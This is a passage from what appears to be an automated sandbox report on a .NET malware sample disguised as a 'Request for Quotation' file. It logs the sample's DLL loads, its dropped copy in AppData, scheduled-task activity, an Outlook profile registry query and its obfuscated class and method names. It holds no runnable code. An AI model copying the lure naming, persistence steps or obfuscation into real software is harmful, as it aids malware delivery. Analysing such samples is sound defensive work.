                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: secur32.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs.Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs.Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C576A0 push eax; ret 0_2_06C576A1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_01259C30 push esp; retf 0127h9_2_01259D55
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A76A0 push eax; ret 11_2_069A76A1
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB9241 push es; ret 14_2_06DB9244
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: section name: .text entropy: 7.944191004977694
                Source: jnqeRRexnD.exe.0.drStatic PE information: section name: .text entropy: 7.944191004977694
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, UPSlk94tjStGG9oASY.csHigh entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ovvxIOBcgJSvJUVhrj.csHigh entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, jQhdguv7LgIcxDIctV.csHigh entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.csHigh entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.csHigh entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, X7d5Q5p1LvpfLmNfVx.csHigh entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, Ii9Xnwkaay1WuTYMGQ.csHigh entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, x5ws4ZMjtJeIYwNfXm.csHigh entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, aeNkwmhsZGOkwOyTql.csHigh entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, sCMxesXXjqAegoG9j6G.csHigh entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, iMBWkb0as7CGSU5mdc.csHigh entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, H9Z5mTAKXZyOtcycmt.csHigh entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, cVsg14PySj56ttQ831.csHigh entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, QqELW6HxRqDoYT0tcl.csHigh entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, POlyOhfijgKRcdlA2f.csHigh entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ERskp5zfMQtJPNdwj4.csHigh entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, hJrajR89jKhw22GlAw.csHigh entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, v1YFv8XpsPxjF1eUO8l.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, f0fXPuminhNt55QPq6.csHigh entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, knUupbQZqxsA2ZB6Nx.csHigh entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, RjDupPnYBMvHAAEH05.csHigh entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, o9P0T5X38MD9r6NPGD7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, UPSlk94tjStGG9oASY.csHigh entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ovvxIOBcgJSvJUVhrj.csHigh entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, jQhdguv7LgIcxDIctV.csHigh entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.csHigh entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.csHigh entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
